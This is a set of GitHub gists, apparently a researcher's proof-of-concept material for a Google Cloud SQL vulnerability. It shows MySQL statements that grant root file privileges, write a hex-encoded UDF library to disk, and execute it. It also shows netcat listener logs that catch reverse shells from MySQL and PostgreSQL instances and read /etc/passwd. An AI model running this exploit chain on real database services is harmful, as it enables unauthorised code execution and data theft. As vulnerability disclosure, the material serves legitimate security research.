irsl
/ gist:0142e646174eadba3fcb0d144475724b
Created
February 16, 2021 22:15
google cloud sql unrestricted database flag
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "name": "default_tablespace", | |
| "type": "STRING", | |
| "appliesTo": [ | |
| "POSTGRES_9_6", | |
| "POSTGRES_10", | |
| "POSTGRES_11", | |
| "POSTGRES_12", | |
| "POSTGRES_13" | |
| ], | |
| "requiresRestart": false, |
irsl
/ gist:9b1dec8ab2a7a3cdfaa2dd8802c7b100
Created
February 16, 2021 22:21
gcp patch database flags
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mysql> show global variables like "%secure_file%"; | |
| +------------------+-------------+ | |
| | Variable_name | Value | | |
| +------------------+-------------+ | |
| | secure_file_priv | /mysql/tmp/ | | |
| +------------------+-------------+ | |
| 1 row in set (0.01 sec) | |
| mysql> show global variables like "%init_conn%"; |
irsl
/ gist:b0bcc159ff879ada08dbd36d015f3ca9
Created
February 16, 2021 22:24
mysql stored procedure output
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mysql> select CustomerLevel(10); | |
| +-------------------+ | |
| | CustomerLevel(10) | | |
| +-------------------+ | |
| | SILVER | | |
| +-------------------+ | |
| 1 row in set (0.02 sec) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DELIMITER $$ | |
| CREATE FUNCTION NonDet() | |
| RETURNS VARCHAR(20) | |
| BEGIN | |
| UPDATE mysql.user SET File_priv='Y' WHERE User='root'; | |
| RETURN "foobar"; | |
| END$$ | |
| DELIMITER ; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mysql> select User, Host, File_priv from mysql.user where User="root"; | |
| +------+------+-----------+ | |
| | User | Host | File_priv | | |
| +------+------+-----------+ | |
| | root | % | Y | | |
| +------+------+-----------+ | |
| 1 row in set (0.01 sec) |
irsl
/ gist:3ac98826b241a82e34b20f8415fb7a06
Created
February 16, 2021 22:27
dropping mysql udf via a stored proc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DELIMITER $$ | |
| CREATE FUNCTION UdfSys3() | |
| RETURNS VARCHAR(100) | |
| SQL SECURITY INVOKER | |
| BEGIN | |
| SELECT 0x7f45… | |
| INTO DUMPFILE '/mysql/tmp/lib_mysqludf_sys3.so'; | |
| RETURN "lib_mysqludf_sys3.so"; | |
| END$$ | |
| DELIMITER ; |
irsl
/ gist:c451ef90d6e240740ccf0d3f2a29acbb
Created
February 16, 2021 22:27
mysql-udf-code-execution-proof
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| mysql> CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys3.so'; | |
| Query OK, 0 rows affected (0.02 sec) | |
| mysql> select lib_mysqludf_sys_info (); | |
| +--------------------------------+ | |
| | lib_mysqludf_sys_info () | | |
| +--------------------------------+ | |
| | lib_mysqludf_sys version 0.0.3 | | |
| +--------------------------------+ | |
| 1 row in set (0.02 sec) | |
| Query OK, 0 rows affected (0.01 sec) |
irsl
/ gist:7a5fc96f088ceb339c493da648f967d0
Created
February 16, 2021 22:28
reverse-shell-in-google-mysql
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@debian-2gb-nbg1-1:~# nc -v -l -p 51111 | |
| listening on [any] 51111 ... | |
| connect to [168.119.114.130] from 112.29.155.104.bc.googleusercontent.com [104.155.29.112] 57984 | |
| id | |
| uid=2345 gid=2345 groups=2345 | |
| cat /etc/passwd | grep mysql | |
| /bin/sh: 2: grep: not found | |
| cat: write error: Broken pipe | |
| cat /etc/passwd | |
| root:x:0:0:root:/:/bin/sh |
irsl
/ gist:5865133ee6f845a4e66888d30c4eec46
Created
February 16, 2021 22:34
pgsql-code-execution-proof
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@debian-2gb-nbg1-1:~# nc -v -l -p 51111 | |
| listening on [any] 51111 ... | |
| connect to [168.119.114.130] from 153.111.187.35.bc.googleusercontent.com [35.187.111.153] 47884 | |
| id | |
| uid=2345(postgres) gid=2345(postgres) groups=2345(postgres) |
irsl
/ gist:883151a51144aa7183be9f4b801bce5a
Created
September 1, 2021 21:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@f4297f8cd9e5:/data/cloud-build/reproto# cat ../reproto-argo/worker.proto | |
| // original: blaze-out/k8-opt/genfiles/cloud/build/proto/worker/worker_grpc.pb.go | |
| syntax = "proto3"; | |
| option go_package = "cloud/build/proto/worker"; | |
| message VMIdentityRequest { |